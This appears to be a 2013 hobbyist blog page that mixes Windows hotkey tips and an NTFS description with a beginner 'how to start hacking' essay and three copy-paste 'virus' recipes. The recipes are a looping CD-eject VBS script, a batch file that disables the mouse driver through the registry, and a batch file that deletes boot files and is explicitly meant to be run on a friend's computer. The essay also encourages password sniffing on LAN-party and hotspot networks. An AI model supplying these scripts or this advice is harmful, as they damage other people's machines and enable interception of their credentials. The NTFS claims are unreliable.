Thursday, 24 January 2013

// // Leave a Comment

PC tip

. [SHIFT] + [alt] + [PrntScrn] – high contrast
A window will open, click OK or simply hit [Enter]. This will enlarge the font on all open Windows and change colors to high contrast. For example the desktop will turn black, what was black text on white background will be reversed. Clicking the same key combination again reverts the changes.
Read More
// // Leave a Comment

how to start hacking

NOTE: "PLEASE LERN "

Alot of people ask “How do i
learn hacking?”, “Where do i
start?”, “How do i become a
hacker”… and so on. I
answered the question a
million times. Now we all can just give them this link to my
blog. ^^ .This is my opinion
about everything. Others
might think about it in a
different way. Eat it or just
throw it away. 


What is hacking? 

Hacking is a hobby. There are
many ways of hacking. Some
break security systems, some
reverse code.


 In my opinion
everything has to do with
hacking. If you want to become a “hacker”. You have
to get some knowledge in
computer science and love to
play around with it. That’s
basicly everything a hacker
needs ;) . What do i have to learn? This really depends on what
you want to achieve. For
example “I want to learn to
break into systems with tools
out there and i don’t want to
know a programming language”




. For me you are no
hacker then but then you just
need to learn metasploit and
co. ;)
There are some main topics in
my opinion that are important. ♣Using a computer (Linux,
configuration and so on)
♣Networking (Protocols and
how does everything work)
♣Software (Developing and
Reversing) ♣Hardware (How does your
CPU work and so on. Not my
best topic but i got some
knowledge here) Using a computer Most people, who read my
blog, have this knowledge. If
you don’t i give you the
advise to install Linux and play
around with it. Configure
some Apache servers or something like that. Just play
around till you feel
comfortable with it. Compile
some programs and so on. If
you are able to compile your
Linux kernel and use it (maybe with an optimized
configuration for your pc). This
topic should be done for you.
You don’t need to know how
to compile a kernel. Just
feeling comfortable with Linux should proof you know
how to use your computer ;) . The other topics can be learned
parallel. There is no need to
focus on one topic. Networking In my opinion everyone needs
to know how to setup a
network. Learn how to
calculate the subnet mask and
co. This should be easy just
read something about it. Google helps alot here ;) .
Learn how everything works.
Examples are ARP Protocol,
TCP/IP Protocol and how
WLAN works. With this
knowledge you can have alot of fun. You should be able to
MitM attack a router and pc
with this. With this setup
sniffing should be possible. This
is enough knowledge here in
my opinion but depending on your needs you can lern more.
Google topics or interesting
tools ♣pcap (for devs, if you want
or know software
development, this is
interesting for you)
♣arpspoof (dsniff package)
♣fragrouter (-B1 was it if i remember right to do
forwarding so the network
doesn’t break if you hook in
there)
♣dsniff tools etc. All tools you need here are on
the net and knowing a
network can be quite funny
on a LAN Party. Guys never
really never ever login private
pages on a lan party or something like this. Public
networks are public for a
network hacker ;) . Software This is my favorite. I work as
software engineer and i love
this topic. For Reversing this
blog has a tutorial series,
which starts here. Before
learning reversing you have to learn software development. I
recommend every so called
“hacker” to have at least a
basic C knowledge. People
always ask what language do i
have to learn. The question is obsolete. If you know C,
which is a functional language,
very well and want to learn
functional programming in VB.
The only thing that differs is
the syntax. I read very often there are so many differences
and just a hand of people
know assembler. This is just
plain bullshit. I know more
than a hand of people that
reverse code (which will be assembler). ;) Other rumor i
hear often from wannabe
hackers. Are that you use
absolute addresses while
developing assembler and the
compiler creates relative addresses. That’s why nearly
no one knows assembler. That
means knowing assembler
needs basic addition and
subtraction. Yeah a assembler
developer can’t do that -.-. I recommend to learn this
languages in this order: ♣C (functional programming)
♣C++ (Object oriented
programming)
♣Assembler (Low level
programming) Assembler
The masterpiece , i know no-
one who really develops
software with it. Except he is
forced to. Knowing this
language gives you the following advantages: ♣Basic knowledge for
reversing
♣Code optimizing
♣Everyone, who knows
assembler. Can imagine what
the CPU does. Hardware: You should know how a cpu
works and how to read/write
a circuit by a binary table or
formula. This is the basic,
which i know. If you want to
go deeper in this topic. Microcontroller and/or FPGAs
should be your topic. Learning
this topic can be expensive. I
recommend you to learn the
Software part next or better
before this topic. Going deep into hardware engineering
needs software. Conclusions: There is no way to give you a
numbered list what todo/learn
to be a hacker. Hacker just
means that you know
computer science and want to
do experiments with this knowledge. If i had to start
from the beginning i would do
it this way. ♣Install Linux and play around
with it
♣Setup my network in linux
so i got internet :D
♣Learn C/C++ with a book and
all it’s examples ♣Go to a lan party or hotspot
and play around with the
networking tools (don’t do
bad things, if you sniff a
password be happy, you made
it. Don’t use it for bad things! You want to be a hacker not a
cracker)
♣Play around with some
hardware and develope
software Now some years should be
gone and you should have the
knowledge to go alone from
here on. I hope this helps some people
to make the right decisions.
How to start.................
Read More
// // Leave a Comment

NTFS

About The NTFS

NTFS is an New Technology file system which is the best for Performance in your PC's Hard Drive as its Have Various Features Such as

* Its easily allocated the Space
* The virtual memory Runs smoothly
* uninterruted Facility for Data Storing
* The executing task is very quick and output response is very fast
* Compatiable with 64Bits and 32bits Artitecture environment
* Encyption and Decyption is Fast and Smooth
* Better Compressing Speed
* Sharply Readable to the Data address
* Recoverable almostly

So Always use the NTFS Hard Drive
Read More
// // Leave a Comment

Harmful Virus

CREATE A HARMLESS VIRUS WITH NOTEPAD-
CONTINUOUSLY EJECT CD/DVD
DRIVES.

Copy this code and paste it in
Notepad as Virus.vbs or *.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000 loop

Double click to open this file
Read More
// // Leave a Comment

Disable Mouse :P

Make a virus that disable Mouse...

Today we will be making a batch virus which is harmfull
It will disable your mouse so think before trying it on yourself...

1. Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as virus.bat
3. Done you just created your virus...
Read More
// // Leave a Comment

Shutdown Pc

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a shutdown.bat

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.trY iT on ur frNds compuTer.
I'm nt reSponsIBLe fr ANY daMAgE
Read More
// // Leave a Comment

List of Most Important Hotkeys

Tips For Win 8

of Most Important Hotkeys
Here is a list of hotkeys to make your Windows 8
experiece even a fun:
Win : switch between the Start screen and the last-
running Windows 8 app
Win + C : displays the Charms: the Settings, Devices,
Share and Search options
Win + D : launches the desktop
Win + E : launches Explorer
Win + F : opens the File Search pane
Win + H : opens the Share pane
Win + I : opens Settings
Win + K : opens the Devices pane
Win + L : locks your PC
Win + M : minimises the current Explorer or Internet Explorer window (works in the full-screen IE, too)
Win + O : toggles device orientation lock on and off
Win + P : switch your display to a second display or projector
Win + Q : open the App Search pane
Win + R : opens the Run box
Win + U : open the Ease of Access Centre
Win + V : cycle through toasts (notifications)
Win + W : search your system settings (type POWER
for links to all power-related options, say)



Win + X : displays a text menu of useful Windows tools and applets
Win + Z : displays the right-click context menu when in a full-screen app
Win + + : launch Magnifier and zoom in
Win + – : zoom out
Win + , : Aero peek at the desktop
Win + Enter : launch Narrator
Win + PgUp : move the current screen to the left- hand monitor
Win + PgDn : move the current screen to the right- hand monitor
Win + PrtSc : capture the current screen and save it to your Pictures folder
Win + Tab : switch between running apps On Tablet:
To take a screenshot on a Windows 8 tablet, simultaneously press the Windows button and the volume-down button on the tablet chassis.


Some of the Keyboard Tricks
Create the ® symbol Alt + 0174 = ®

alt+0176 = ° [degrees for Temperature]

alt+0174 = ® [Registered Trademark]

alt+0153 = ™ [Trade Mark]

alt+169 = ©[Copyright]
Read More